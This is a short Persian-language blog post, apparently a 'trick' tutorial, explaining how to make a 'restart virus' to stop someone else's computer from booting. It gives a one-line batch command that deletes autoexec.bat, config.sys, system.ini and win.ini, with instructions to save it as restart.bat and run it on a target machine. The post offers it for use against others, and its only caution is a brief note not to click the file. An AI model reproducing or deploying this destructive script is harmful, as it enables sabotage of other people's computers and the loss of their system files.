ساخت ويروس restart

<<در اين ترفند قصد داريم كه به شما ياد بديم كه چگونه يه ويروس بسازيد كه با اون كامپيوتر طرف restart بشه و ديگه با لا نياد>>

براي اين كار نت پد را باز كرده و عبارت زير را در ان كپي كنيد:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini 
 سپس SaveAs را انتخاب و فايل را با پسوند bat سيو كنيد يعني با نامي مثل restart.bat با اجراي اين ويروس ، کامپيوتر مورد نظر Reset شده و ديگر ويندوز آن بالا نميايد! بنابر اين از كليك روي ان خودداري نماييد.مطالب مرتبط با این پست: